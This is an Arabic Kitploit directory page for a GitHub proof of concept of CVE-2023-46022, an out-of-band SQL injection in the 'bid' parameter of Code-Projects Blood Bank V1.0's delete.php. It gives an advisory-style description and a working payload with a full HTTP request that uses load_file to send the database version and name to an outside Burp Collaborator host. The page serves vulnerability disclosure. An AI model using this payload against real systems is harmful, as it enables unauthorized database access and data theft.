Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability — إثبات مفهوم لاستغلال ثغرة CVE-2023-46022، يوضح حقن SQL خارج النطاق في تطبيق Code-Projects Blood Bank الإصدار V1.0 عبر المعامل 'bid'، مما يتيح استخراج إصدار قاعدة البيانات والبيانات من خلال Burp Collaborator. | Kitploit
أدوات/GitHubGitHub/ersinerenler/cve-2023-46022-code-projects-blood-bank-1.0-oob-sql-injection-vulnerability
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubersinerenler/cve-2023-46022-code-projects-blood-bank-1.0-oob-sql-injection-vulnerability

CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability

إثبات مفهوم لاستغلال ثغرة CVE-2023-46022، يوضح حقن SQL خارج النطاق في تطبيق Code-Projects Blood Bank الإصدار V1.0 عبر المعامل 'bid'، مما يتيح استخراج إصدار قاعدة البيانات والبيانات من خلال Burp Collaborator.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability

  • مؤلف الاستغلال: ersinerenler

الصفحة الرئيسية للبائع

  • https://code-projects.org/blood-bank-in-php-with-source-code

رابط البرنامج

  • https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip

نظرة عامة

  • يتعرض بنك الدم Code-Projects Blood Bank V1.0 لثغرة أمنية خطيرة تتعلق بحقن SQL خارج النطاق (OOB) عبر المعامل 'bid' في الملف /delete.php. تنشأ هذه الثغرة بسبب نقص آليات الحماية المناسبة، مما يمكّن المهاجمين من إساءة استخدام المعامل وتنفيذ هجمات حقن SQL خارج النطاق عبر Burp Collaborator. قد يؤدي ذلك إلى الوصول غير المصرح به واستخراج معلومات حساسة من قواعد البيانات.

تفاصيل الثغرة

  • CVE ID: CVE-2023-46022
  • الإصدار المتأثر: Blood Bank V1.0
  • الملف القابل للاستغلال: /delete.php
  • اسم المعامل: bid
  • نوع الهجوم: Local

المراجع:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46022
  • https://nvd.nist.gov/vuln/detail/CVE-2023-46022

الوصف

  • المعامل 'bid' في الملف /delete.php من Code-Projects Blood Bank V1.0 معرض لحقن SQL خارج النطاق. تنشأ هذه الثغرة من آليات حماية غير كافية، مما يسمح للمهاجمين باستغلال المعامل باستخدام Burp Collaborator لبدء هجمات حقن SQL خارج النطاق. من خلال هذه التقنية، يمكن للمهاجم استخراج معلومات حساسة من قواعد البيانات.

إثبات المفهوم (PoC) :

  • اعتراض الطلب إلى delete.php عبر Burp Suite
  • حقن الحمولة في المعاملات القابلة للاستغلال
  • الحمولة: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b'
  • مثال لطلب المعامل bid
root@kitploit:~
---
GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.cuaxacpnxbay7ss8o3csf4bkwb22qtei.oastify.com\\a.txt')))%2b' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://localhost/bloodbank/bloodinfo.php
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
---
  • تم الاستيلاء على معلومات قاعدة البيانات والإصدار عبر Burp Suite Collaborator
صورة
تنزيل الأداة